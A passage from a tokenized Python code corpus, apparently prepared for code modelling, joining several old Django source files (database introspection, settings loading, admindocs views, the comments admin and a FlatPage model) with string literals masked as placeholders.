<s> from django . db . backends . postgresql . base import quote_name <EOL> def get_table_list ( cursor ) : <EOL> "<STR_LIT>" <EOL> cursor . execute ( """<STR_LIT>""" ) <EOL> return [ row [ <NUM_LIT:0> ] for row in cursor . fetchall ( ) ] <EOL> def get_table_description ( cursor , table_name ) : <EOL> "<STR_LIT>" <EOL> cursor . execute ( "<STR_LIT>" % quote_name ( table_name ) ) <EOL> return cursor . description <EOL> def get_relations ( cursor , table_name ) : <EOL> """<STR_LIT>""" <EOL> cursor . execute ( """<STR_LIT>""" , [ table_name ] ) <EOL> relations = { } <EOL> for row in cursor . fetchall ( ) : <EOL> try : <EOL> relations [ int ( row [ <NUM_LIT:0> ] [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) - <NUM_LIT:1> ] = ( int ( row [ <NUM_LIT:1> ] [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) - <NUM_LIT:1> , row [ <NUM_LIT:2> ] ) <EOL> except ValueError : <EOL> continue <EOL> return relations <EOL> def get_indexes ( cursor , table_name ) : <EOL> """<STR_LIT>""" <EOL> cursor . execute ( """<STR_LIT>""" , [ table_name ] ) <EOL> indexes = { } <EOL> for row in cursor . fetchall ( ) : <EOL> if '<STR_LIT:U+0020>' in row [ <NUM_LIT:1> ] : <EOL> continue <EOL> indexes [ row [ <NUM_LIT:0> ] ] = { '<STR_LIT:primary_key>' : row [ <NUM_LIT:3> ] , '<STR_LIT>' : row [ <NUM_LIT:2> ] } <EOL> return indexes <EOL> DATA_TYPES_REVERSE = { <EOL> <NUM_LIT:16> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> } </s>
<s> """<STR_LIT>""" <EOL> def function ( receiver ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( receiver , '<STR_LIT>' ) : <EOL> if hasattr ( receiver . __call__ , '<STR_LIT>' ) or hasattr ( receiver . __call__ , '<STR_LIT>' ) : <EOL> receiver = receiver . __call__ <EOL> if hasattr ( receiver , '<STR_LIT>' ) : <EOL> return receiver , receiver . im_func . func_code , <NUM_LIT:1> <EOL> elif not hasattr ( receiver , '<STR_LIT>' ) : <EOL> raise ValueError ( '<STR_LIT>' % ( receiver , type ( receiver ) ) ) <EOL> return receiver , receiver . func_code , <NUM_LIT:0> <EOL> def robustApply ( receiver , * arguments , ** named ) : <EOL> """<STR_LIT>""" <EOL> receiver , codeObject , startIndex = function ( receiver ) <EOL> acceptable = codeObject . co_varnames [ startIndex + len ( arguments ) : codeObject . co_argcount ] <EOL> for name in codeObject . co_varnames [ startIndex : startIndex + len ( arguments ) ] : <EOL> if named . has_key ( name ) : <EOL> raise TypeError ( <EOL> """<STR_LIT>""" % ( <EOL> name , receiver , <EOL> ) <EOL> ) <EOL> if not ( codeObject . co_flags & <NUM_LIT:8> ) : <EOL> for arg in named . keys ( ) : <EOL> if arg not in acceptable : <EOL> del named [ arg ] <EOL> return receiver ( * arguments , ** named ) </s>
<s> try : <EOL> from pkg_resources import resource_string <EOL> except ImportError : <EOL> resource_string = None <EOL> from django . template import TemplateDoesNotExist <EOL> from django . conf import settings <EOL> def load_template_source ( template_name , template_dirs = None ) : <EOL> """<STR_LIT>""" <EOL> if resource_string is not None : <EOL> pkg_name = '<STR_LIT>' + template_name <EOL> for app in settings . INSTALLED_APPS : <EOL> try : <EOL> return ( resource_string ( app , pkg_name ) , '<STR_LIT>' % ( app , pkg_name ) ) <EOL> except : <EOL> pass <EOL> raise TemplateDoesNotExist , template_name <EOL> load_template_source . is_usable = resource_string is not None </s>
<s> """<STR_LIT>""" <EOL> import sre_parse , sre_compile , sre_constants <EOL> from sre_constants import BRANCH , SUBPATTERN <EOL> from re import VERBOSE , MULTILINE , DOTALL <EOL> import re <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> FLAGS = ( VERBOSE | MULTILINE | DOTALL ) <EOL> class Scanner ( object ) : <EOL> def __init__ ( self , lexicon , flags = FLAGS ) : <EOL> self . actions = [ None ] <EOL> s = sre_parse . Pattern ( ) <EOL> s . flags = flags <EOL> p = [ ] <EOL> for idx , token in enumerate ( lexicon ) : <EOL> phrase = token . pattern <EOL> try : <EOL> subpattern = sre_parse . SubPattern ( s , <EOL> [ ( SUBPATTERN , ( idx + <NUM_LIT:1> , sre_parse . parse ( phrase , flags ) ) ) ] ) <EOL> except sre_constants . error : <EOL> raise <EOL> p . append ( subpattern ) <EOL> self . actions . append ( token ) <EOL> p = sre_parse . SubPattern ( s , [ ( BRANCH , ( None , p ) ) ] ) <EOL> self . scanner = sre_compile . compile ( p ) <EOL> def iterscan ( self , string , idx = <NUM_LIT:0> , context = None ) : <EOL> """<STR_LIT>""" <EOL> match = self . scanner . scanner ( string , idx ) . match <EOL> actions = self . actions <EOL> lastend = idx <EOL> end = len ( string ) <EOL> while True : <EOL> m = match ( ) <EOL> if m is None : <EOL> break <EOL> matchbegin , matchend = m . span ( ) <EOL> if lastend == matchend : <EOL> break <EOL> action = actions [ m . lastindex ] <EOL> if action is not None : <EOL> rval , next_pos = action ( m , context ) <EOL> if next_pos is not None and next_pos != matchend : <EOL> matchend = next_pos <EOL> match = self . scanner . scanner ( string , matchend ) . match <EOL> yield rval , matchend <EOL> lastend = matchend <EOL> def pattern ( pattern , flags = FLAGS ) : <EOL> def decorator ( fn ) : <EOL> fn . pattern = pattern <EOL> fn . regex = re . compile ( pattern , flags ) <EOL> return fn <EOL> return decorator </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import re <EOL> import time <EOL> from django . conf import global_settings <EOL> from django . utils . functional import LazyObject <EOL> from django . utils import importlib <EOL> ENVIRONMENT_VARIABLE = "<STR_LIT>" <EOL> class LazySettings ( LazyObject ) : <EOL> """<STR_LIT>""" <EOL> def _setup ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> settings_module = os . environ [ ENVIRONMENT_VARIABLE ] <EOL> if not settings_module : <EOL> raise KeyError <EOL> except KeyError : <EOL> raise ImportError ( "<STR_LIT>" % ENVIRONMENT_VARIABLE ) <EOL> self . _wrapped = Settings ( settings_module ) <EOL> def configure ( self , default_settings = global_settings , ** options ) : <EOL> """<STR_LIT>""" <EOL> if self . _wrapped != None : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> holder = UserSettingsHolder ( default_settings ) <EOL> for name , value in options . items ( ) : <EOL> setattr ( holder , name , value ) <EOL> self . _wrapped = holder <EOL> def configured ( self ) : <EOL> """<STR_LIT>""" <EOL> return bool ( self . _wrapped ) <EOL> configured = property ( configured ) <EOL> class Settings ( object ) : <EOL> def __init__ ( self , settings_module ) : <EOL> for setting in dir ( global_settings ) : <EOL> if setting == setting . upper ( ) : <EOL> setattr ( self , setting , getattr ( global_settings , setting ) ) <EOL> self . SETTINGS_MODULE = settings_module <EOL> try : <EOL> mod = importlib . import_module ( self . SETTINGS_MODULE ) <EOL> except ImportError , e : <EOL> raise ImportError ( "<STR_LIT>" % ( self . SETTINGS_MODULE , e ) ) <EOL> tuple_settings = ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> for setting in dir ( mod ) : <EOL> if setting == setting . upper ( ) : <EOL> setting_value = getattr ( mod , setting ) <EOL> if setting in tuple_settings and type ( setting_value ) == str : <EOL> setting_value = ( setting_value , ) <EOL> setattr ( self , setting , setting_value ) <EOL> new_installed_apps = [ ] <EOL> for app in self . 
INSTALLED_APPS : <EOL> if app . endswith ( '<STR_LIT>' ) : <EOL> app_mod = importlib . import_module ( app [ : - <NUM_LIT:2> ] ) <EOL> appdir = os . path . dirname ( app_mod . __file__ ) <EOL> app_subdirs = os . listdir ( appdir ) <EOL> app_subdirs . sort ( ) <EOL> name_pattern = re . compile ( r'<STR_LIT>' ) <EOL> for d in app_subdirs : <EOL> if name_pattern . match ( d ) and os . path . isdir ( os . path . join ( appdir , d ) ) : <EOL> new_installed_apps . append ( '<STR_LIT>' % ( app [ : - <NUM_LIT:2> ] , d ) ) <EOL> else : <EOL> new_installed_apps . append ( app ) <EOL> self . INSTALLED_APPS = new_installed_apps <EOL> if hasattr ( time , '<STR_LIT>' ) and getattr ( self , '<STR_LIT>' ) : <EOL> os . environ [ '<STR_LIT>' ] = self . TIME_ZONE <EOL> time . tzset ( ) <EOL> class UserSettingsHolder ( object ) : <EOL> """<STR_LIT>""" <EOL> SETTINGS_MODULE = None <EOL> def __init__ ( self , default_settings ) : <EOL> """<STR_LIT>""" <EOL> self . default_settings = default_settings <EOL> def __getattr__ ( self , name ) : <EOL> return getattr ( self . default_settings , name ) <EOL> def __dir__ ( self ) : <EOL> return self . __dict__ . keys ( ) + dir ( self . default_settings ) <EOL> __members__ = property ( lambda self : self . __dir__ ( ) ) <EOL> settings = LazySettings ( ) </s>
<s> DATE_FORMAT = '<STR_LIT>' <EOL> TIME_FORMAT = '<STR_LIT>' <EOL> YEAR_MONTH_FORMAT = '<STR_LIT>' <EOL> MONTH_DAY_FORMAT = '<STR_LIT>' <EOL> SHORT_DATE_FORMAT = '<STR_LIT>' <EOL> DECIMAL_SEPARATOR = '<STR_LIT:U+002C>' <EOL> THOUSAND_SEPARATOR = '<STR_LIT:.>' </s>
<s> from django import template , templatetags <EOL> from django . template import RequestContext <EOL> from django . conf import settings <EOL> from django . contrib . admin . views . decorators import staff_member_required <EOL> from django . db import models <EOL> from django . shortcuts import render_to_response <EOL> from django . core . exceptions import ImproperlyConfigured , ViewDoesNotExist <EOL> from django . http import Http404 <EOL> from django . core import urlresolvers <EOL> from django . contrib . admindocs import utils <EOL> from django . contrib . sites . models import Site <EOL> from django . utils . importlib import import_module <EOL> from django . utils . translation import ugettext as _ <EOL> from django . utils . safestring import mark_safe <EOL> import inspect , os , re <EOL> MODEL_METHODS_EXCLUDE = ( '<STR_LIT:_>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class GenericSite ( object ) : <EOL> domain = '<STR_LIT>' <EOL> name = '<STR_LIT>' <EOL> def get_root_path ( ) : <EOL> try : <EOL> return urlresolvers . reverse ( '<STR_LIT>' ) <EOL> except urlresolvers . NoReverseMatch : <EOL> from django . contrib import admin <EOL> try : <EOL> return urlresolvers . reverse ( admin . site . root , args = [ '<STR_LIT>' ] ) <EOL> except urlresolvers . NoReverseMatch : <EOL> return getattr ( settings , "<STR_LIT>" , "<STR_LIT>" ) <EOL> def doc_index ( request ) : <EOL> if not utils . docutils_is_available : <EOL> return missing_docutils_page ( request ) <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : get_root_path ( ) , <EOL> } , context_instance = RequestContext ( request ) ) <EOL> doc_index = staff_member_required ( doc_index ) <EOL> def bookmarklets ( request ) : <EOL> admin_root = get_root_path ( ) <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : admin_root , <EOL> '<STR_LIT>' : mark_safe ( "<STR_LIT>" % ( request . is_secure ( ) and '<STR_LIT>' or '<STR_LIT:http>' , request . 
get_host ( ) , admin_root ) ) , <EOL> } , context_instance = RequestContext ( request ) ) <EOL> bookmarklets = staff_member_required ( bookmarklets ) <EOL> def template_tag_index ( request ) : <EOL> if not utils . docutils_is_available : <EOL> return missing_docutils_page ( request ) <EOL> load_all_installed_template_libraries ( ) <EOL> tags = [ ] <EOL> app_libs = template . libraries . items ( ) <EOL> builtin_libs = [ ( None , lib ) for lib in template . builtins ] <EOL> for module_name , library in builtin_libs + app_libs : <EOL> for tag_name , tag_func in library . tags . items ( ) : <EOL> title , body , metadata = utils . parse_docstring ( tag_func . __doc__ ) <EOL> if title : <EOL> title = utils . parse_rst ( title , '<STR_LIT>' , _ ( '<STR_LIT>' ) + tag_name ) <EOL> if body : <EOL> body = utils . parse_rst ( body , '<STR_LIT>' , _ ( '<STR_LIT>' ) + tag_name ) <EOL> for key in metadata : <EOL> metadata [ key ] = utils . parse_rst ( metadata [ key ] , '<STR_LIT>' , _ ( '<STR_LIT>' ) + tag_name ) <EOL> if library in template . builtins : <EOL> tag_library = None <EOL> else : <EOL> tag_library = module_name . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] <EOL> tags . append ( { <EOL> '<STR_LIT:name>' : tag_name , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT:body>' : body , <EOL> '<STR_LIT>' : metadata , <EOL> '<STR_LIT>' : tag_library , <EOL> } ) <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : get_root_path ( ) , <EOL> '<STR_LIT>' : tags <EOL> } , context_instance = RequestContext ( request ) ) <EOL> template_tag_index = staff_member_required ( template_tag_index ) <EOL> def template_filter_index ( request ) : <EOL> if not utils . docutils_is_available : <EOL> return missing_docutils_page ( request ) <EOL> load_all_installed_template_libraries ( ) <EOL> filters = [ ] <EOL> app_libs = template . libraries . items ( ) <EOL> builtin_libs = [ ( None , lib ) for lib in template . 
builtins ] <EOL> for module_name , library in builtin_libs + app_libs : <EOL> for filter_name , filter_func in library . filters . items ( ) : <EOL> title , body , metadata = utils . parse_docstring ( filter_func . __doc__ ) <EOL> if title : <EOL> title = utils . parse_rst ( title , '<STR_LIT>' , _ ( '<STR_LIT>' ) + filter_name ) <EOL> if body : <EOL> body = utils . parse_rst ( body , '<STR_LIT>' , _ ( '<STR_LIT>' ) + filter_name ) <EOL> for key in metadata : <EOL> metadata [ key ] = utils . parse_rst ( metadata [ key ] , '<STR_LIT>' , _ ( '<STR_LIT>' ) + filter_name ) <EOL> if library in template . builtins : <EOL> tag_library = None <EOL> else : <EOL> tag_library = module_name . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] <EOL> filters . append ( { <EOL> '<STR_LIT:name>' : filter_name , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT:body>' : body , <EOL> '<STR_LIT>' : metadata , <EOL> '<STR_LIT>' : tag_library , <EOL> } ) <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : get_root_path ( ) , <EOL> '<STR_LIT>' : filters <EOL> } , context_instance = RequestContext ( request ) ) <EOL> template_filter_index = staff_member_required ( template_filter_index ) <EOL> def view_index ( request ) : <EOL> if not utils . docutils_is_available : <EOL> return missing_docutils_page ( request ) <EOL> if settings . ADMIN_FOR : <EOL> settings_modules = [ import_module ( m ) for m in settings . ADMIN_FOR ] <EOL> else : <EOL> settings_modules = [ settings ] <EOL> views = [ ] <EOL> for settings_mod in settings_modules : <EOL> urlconf = import_module ( settings_mod . ROOT_URLCONF ) <EOL> view_functions = extract_views_from_urlpatterns ( urlconf . urlpatterns ) <EOL> if Site . _meta . installed : <EOL> site_obj = Site . objects . get ( pk = settings_mod . SITE_ID ) <EOL> else : <EOL> site_obj = GenericSite ( ) <EOL> for ( func , regex ) in view_functions : <EOL> views . append ( { <EOL> '<STR_LIT:name>' : getattr ( func , '<STR_LIT>' , func . __class__ . 
__name__ ) , <EOL> '<STR_LIT>' : func . __module__ , <EOL> '<STR_LIT>' : settings_mod . SITE_ID , <EOL> '<STR_LIT>' : site_obj , <EOL> '<STR_LIT:url>' : simplify_regex ( regex ) , <EOL> } ) <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : get_root_path ( ) , <EOL> '<STR_LIT>' : views <EOL> } , context_instance = RequestContext ( request ) ) <EOL> view_index = staff_member_required ( view_index ) <EOL> def view_detail ( request , view ) : <EOL> if not utils . docutils_is_available : <EOL> return missing_docutils_page ( request ) <EOL> mod , func = urlresolvers . get_mod_func ( view ) <EOL> try : <EOL> view_func = getattr ( import_module ( mod ) , func ) <EOL> except ( ImportError , AttributeError ) : <EOL> raise Http404 <EOL> title , body , metadata = utils . parse_docstring ( view_func . __doc__ ) <EOL> if title : <EOL> title = utils . parse_rst ( title , '<STR_LIT>' , _ ( '<STR_LIT>' ) + view ) <EOL> if body : <EOL> body = utils . parse_rst ( body , '<STR_LIT>' , _ ( '<STR_LIT>' ) + view ) <EOL> for key in metadata : <EOL> metadata [ key ] = utils . parse_rst ( metadata [ key ] , '<STR_LIT>' , _ ( '<STR_LIT>' ) + view ) <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : get_root_path ( ) , <EOL> '<STR_LIT:name>' : view , <EOL> '<STR_LIT>' : title , <EOL> '<STR_LIT:body>' : body , <EOL> '<STR_LIT>' : metadata , <EOL> } , context_instance = RequestContext ( request ) ) <EOL> view_detail = staff_member_required ( view_detail ) <EOL> def model_index ( request ) : <EOL> if not utils . docutils_is_available : <EOL> return missing_docutils_page ( request ) <EOL> m_list = [ m . _meta for m in models . get_models ( ) ] <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : get_root_path ( ) , <EOL> '<STR_LIT>' : m_list <EOL> } , context_instance = RequestContext ( request ) ) <EOL> model_index = staff_member_required ( model_index ) <EOL> def model_detail ( request , app_label , model_name ) : <EOL> if not utils . 
docutils_is_available : <EOL> return missing_docutils_page ( request ) <EOL> try : <EOL> app_mod = models . get_app ( app_label ) <EOL> except ImproperlyConfigured : <EOL> raise Http404 ( _ ( "<STR_LIT>" ) % app_label ) <EOL> model = None <EOL> for m in models . get_models ( app_mod ) : <EOL> if m . _meta . object_name . lower ( ) == model_name : <EOL> model = m <EOL> break <EOL> if model is None : <EOL> raise Http404 ( _ ( "<STR_LIT>" ) % { '<STR_LIT>' : model_name , '<STR_LIT>' : app_label } ) <EOL> opts = model . _meta <EOL> fields = [ ] <EOL> for field in opts . fields : <EOL> if isinstance ( field , models . ForeignKey ) : <EOL> data_type = related_object_name = field . rel . to . __name__ <EOL> app_label = field . rel . to . _meta . app_label <EOL> verbose = utils . parse_rst ( ( _ ( "<STR_LIT>" ) % { '<STR_LIT>' : app_label , '<STR_LIT>' : data_type } ) , '<STR_LIT>' , _ ( '<STR_LIT>' ) + data_type ) <EOL> else : <EOL> data_type = get_readable_field_data_type ( field ) <EOL> verbose = field . verbose_name <EOL> fields . append ( { <EOL> '<STR_LIT:name>' : field . name , <EOL> '<STR_LIT>' : data_type , <EOL> '<STR_LIT>' : verbose , <EOL> '<STR_LIT>' : field . help_text , <EOL> } ) <EOL> for field in opts . many_to_many : <EOL> data_type = related_object_name = field . rel . to . __name__ <EOL> app_label = field . rel . to . _meta . app_label <EOL> verbose = _ ( "<STR_LIT>" ) % { '<STR_LIT>' : app_label , '<STR_LIT:object_name>' : data_type } <EOL> fields . append ( { <EOL> '<STR_LIT:name>' : "<STR_LIT>" % field . name , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> '<STR_LIT>' : utils . parse_rst ( _ ( "<STR_LIT>" ) % verbose , '<STR_LIT>' , _ ( '<STR_LIT>' ) + opts . module_name ) , <EOL> } ) <EOL> fields . append ( { <EOL> '<STR_LIT:name>' : "<STR_LIT>" % field . name , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : utils . parse_rst ( _ ( "<STR_LIT>" ) % verbose , '<STR_LIT>' , _ ( '<STR_LIT>' ) + opts . 
module_name ) , <EOL> } ) <EOL> for func_name , func in model . __dict__ . items ( ) : <EOL> if ( inspect . isfunction ( func ) and len ( inspect . getargspec ( func ) [ <NUM_LIT:0> ] ) == <NUM_LIT:1> ) : <EOL> try : <EOL> for exclude in MODEL_METHODS_EXCLUDE : <EOL> if func_name . startswith ( exclude ) : <EOL> raise StopIteration <EOL> except StopIteration : <EOL> continue <EOL> verbose = func . __doc__ <EOL> if verbose : <EOL> verbose = utils . parse_rst ( utils . trim_docstring ( verbose ) , '<STR_LIT>' , _ ( '<STR_LIT>' ) + opts . module_name ) <EOL> fields . append ( { <EOL> '<STR_LIT:name>' : func_name , <EOL> '<STR_LIT>' : get_return_data_type ( func_name ) , <EOL> '<STR_LIT>' : verbose , <EOL> } ) <EOL> for rel in opts . get_all_related_objects ( ) + opts . get_all_related_many_to_many_objects ( ) : <EOL> verbose = _ ( "<STR_LIT>" ) % { '<STR_LIT>' : rel . opts . app_label , '<STR_LIT:object_name>' : rel . opts . object_name } <EOL> accessor = rel . get_accessor_name ( ) <EOL> fields . append ( { <EOL> '<STR_LIT:name>' : "<STR_LIT>" % accessor , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : utils . parse_rst ( _ ( "<STR_LIT>" ) % verbose , '<STR_LIT>' , _ ( '<STR_LIT>' ) + opts . module_name ) , <EOL> } ) <EOL> fields . append ( { <EOL> '<STR_LIT:name>' : "<STR_LIT>" % accessor , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : utils . parse_rst ( _ ( "<STR_LIT>" ) % verbose , '<STR_LIT>' , _ ( '<STR_LIT>' ) + opts . module_name ) , <EOL> } ) <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : get_root_path ( ) , <EOL> '<STR_LIT:name>' : '<STR_LIT>' % ( opts . app_label , opts . object_name ) , <EOL> '<STR_LIT>' : _ ( "<STR_LIT>" ) % opts . object_name , <EOL> '<STR_LIT:description>' : model . 
__doc__ , <EOL> '<STR_LIT>' : fields , <EOL> } , context_instance = RequestContext ( request ) ) <EOL> model_detail = staff_member_required ( model_detail ) <EOL> def template_detail ( request , template ) : <EOL> templates = [ ] <EOL> for site_settings_module in settings . ADMIN_FOR : <EOL> settings_mod = import_module ( site_settings_module ) <EOL> if Site . _meta . installed : <EOL> site_obj = Site . objects . get ( pk = settings_mod . SITE_ID ) <EOL> else : <EOL> site_obj = GenericSite ( ) <EOL> for dir in settings_mod . TEMPLATE_DIRS : <EOL> template_file = os . path . join ( dir , template ) <EOL> templates . append ( { <EOL> '<STR_LIT:file>' : template_file , <EOL> '<STR_LIT>' : os . path . exists ( template_file ) , <EOL> '<STR_LIT>' : lambda : os . path . exists ( template_file ) and open ( template_file ) . read ( ) or '<STR_LIT>' , <EOL> '<STR_LIT>' : settings_mod . SITE_ID , <EOL> '<STR_LIT>' : site_obj , <EOL> '<STR_LIT>' : list ( settings_mod . TEMPLATE_DIRS ) . index ( dir ) , <EOL> } ) <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : get_root_path ( ) , <EOL> '<STR_LIT:name>' : template , <EOL> '<STR_LIT>' : templates , <EOL> } , context_instance = RequestContext ( request ) ) <EOL> template_detail = staff_member_required ( template_detail ) <EOL> def missing_docutils_page ( request ) : <EOL> """<STR_LIT>""" <EOL> return render_to_response ( '<STR_LIT>' ) <EOL> def load_all_installed_template_libraries ( ) : <EOL> for module_name in template . get_templatetags_modules ( ) : <EOL> mod = import_module ( module_name ) <EOL> libraries = [ <EOL> os . path . splitext ( p ) [ <NUM_LIT:0> ] <EOL> for p in os . listdir ( os . path . dirname ( mod . __file__ ) ) <EOL> if p . endswith ( '<STR_LIT>' ) and p [ <NUM_LIT:0> ] . isalpha ( ) <EOL> ] <EOL> for library_name in libraries : <EOL> try : <EOL> lib = template . get_library ( library_name ) <EOL> except template . 
InvalidTemplateLibrary , e : <EOL> pass <EOL> def get_return_data_type ( func_name ) : <EOL> """<STR_LIT>""" <EOL> if func_name . startswith ( '<STR_LIT>' ) : <EOL> if func_name . endswith ( '<STR_LIT>' ) : <EOL> return '<STR_LIT>' <EOL> elif func_name . endswith ( '<STR_LIT>' ) : <EOL> return '<STR_LIT>' <EOL> return '<STR_LIT>' <EOL> def get_readable_field_data_type ( field ) : <EOL> """<STR_LIT>""" <EOL> return field . description % field . __dict__ <EOL> def extract_views_from_urlpatterns ( urlpatterns , base = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> views = [ ] <EOL> for p in urlpatterns : <EOL> if hasattr ( p , '<STR_LIT>' ) : <EOL> try : <EOL> views . append ( ( p . _get_callback ( ) , base + p . regex . pattern ) ) <EOL> except ViewDoesNotExist : <EOL> continue <EOL> elif hasattr ( p , '<STR_LIT>' ) : <EOL> try : <EOL> patterns = p . url_patterns <EOL> except ImportError : <EOL> continue <EOL> views . extend ( extract_views_from_urlpatterns ( patterns , base + p . regex . pattern ) ) <EOL> else : <EOL> raise TypeError ( _ ( "<STR_LIT>" ) % p ) <EOL> return views <EOL> named_group_matcher = re . compile ( r'<STR_LIT>' ) <EOL> non_named_group_matcher = re . compile ( r'<STR_LIT>' ) <EOL> def simplify_regex ( pattern ) : <EOL> """<STR_LIT>""" <EOL> pattern = named_group_matcher . sub ( lambda m : m . group ( <NUM_LIT:1> ) , pattern ) <EOL> pattern = non_named_group_matcher . sub ( "<STR_LIT>" , pattern ) <EOL> pattern = pattern . replace ( '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT:$>' , '<STR_LIT>' ) . replace ( '<STR_LIT:?>' , '<STR_LIT>' ) . replace ( '<STR_LIT>' , '<STR_LIT:/>' ) . replace ( '<STR_LIT:\\>' , '<STR_LIT>' ) <EOL> if not pattern . startswith ( '<STR_LIT:/>' ) : <EOL> pattern = '<STR_LIT:/>' + pattern <EOL> return pattern </s>
<s> from django . contrib import admin <EOL> from django . contrib . comments . models import Comment <EOL> from django . utils . translation import ugettext_lazy as _ , ungettext <EOL> from django . contrib . comments import get_model <EOL> from django . contrib . comments . views . moderation import perform_flag , perform_approve , perform_delete <EOL> class CommentsAdmin ( admin . ModelAdmin ) : <EOL> fieldsets = ( <EOL> ( None , <EOL> { '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) } <EOL> ) , <EOL> ( _ ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : ( '<STR_LIT:user>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) } <EOL> ) , <EOL> ( _ ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) } <EOL> ) , <EOL> ) <EOL> list_display = ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> list_filter = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> date_hierarchy = '<STR_LIT>' <EOL> ordering = ( '<STR_LIT>' , ) <EOL> raw_id_fields = ( '<STR_LIT:user>' , ) <EOL> search_fields = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> actions = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> def get_actions ( self , request ) : <EOL> actions = super ( CommentsAdmin , self ) . get_actions ( request ) <EOL> if not request . user . is_superuser and '<STR_LIT>' in actions : <EOL> actions . pop ( '<STR_LIT>' ) <EOL> if not request . user . has_perm ( '<STR_LIT>' ) : <EOL> if '<STR_LIT>' in actions : <EOL> actions . pop ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in actions : <EOL> actions . pop ( '<STR_LIT>' ) <EOL> return actions <EOL> def flag_comments ( self , request , queryset ) : <EOL> self . _bulk_flag ( request , queryset , perform_flag , <EOL> lambda n : ungettext ( '<STR_LIT>' , '<STR_LIT>' , n ) ) <EOL> flag_comments . 
short_description = _ ( "<STR_LIT>" ) <EOL> def approve_comments ( self , request , queryset ) : <EOL> self . _bulk_flag ( request , queryset , perform_approve , <EOL> lambda n : ungettext ( '<STR_LIT>' , '<STR_LIT>' , n ) ) <EOL> approve_comments . short_description = _ ( "<STR_LIT>" ) <EOL> def remove_comments ( self , request , queryset ) : <EOL> self . _bulk_flag ( request , queryset , perform_delete , <EOL> lambda n : ungettext ( '<STR_LIT>' , '<STR_LIT>' , n ) ) <EOL> remove_comments . short_description = _ ( "<STR_LIT>" ) <EOL> def _bulk_flag ( self , request , queryset , action , done_message ) : <EOL> """<STR_LIT>""" <EOL> n_comments = <NUM_LIT:0> <EOL> for comment in queryset : <EOL> action ( request , comment ) <EOL> n_comments += <NUM_LIT:1> <EOL> msg = ungettext ( u'<STR_LIT>' , <EOL> u'<STR_LIT>' , <EOL> n_comments ) <EOL> self . message_user ( request , msg % { '<STR_LIT:count>' : n_comments , '<STR_LIT:action>' : done_message ( n_comments ) } ) <EOL> if get_model ( ) is Comment : <EOL> admin . site . register ( Comment , CommentsAdmin ) </s>
<s> from django . db import models <EOL> from django . contrib . sites . models import Site <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> class FlatPage ( models . Model ) : <EOL> url = models . CharField ( _ ( '<STR_LIT>' ) , max_length = <NUM_LIT:100> , db_index = True ) <EOL> title = models . CharField ( _ ( '<STR_LIT:title>' ) , max_length = <NUM_LIT:200> ) <EOL> content = models . TextField ( _ ( '<STR_LIT:content>' ) , blank = True ) <EOL> enable_comments = models . BooleanField ( _ ( '<STR_LIT>' ) ) <EOL> template_name = models . CharField ( _ ( '<STR_LIT>' ) , max_length = <NUM_LIT> , blank = True , <EOL> help_text = _ ( "<STR_LIT>" ) ) <EOL> registration_required = models . BooleanField ( _ ( '<STR_LIT>' ) , help_text = _ ( "<STR_LIT>" ) ) <EOL> sites = models . ManyToManyField ( Site ) <EOL> class Meta : <EOL> db_table = '<STR_LIT>' <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> 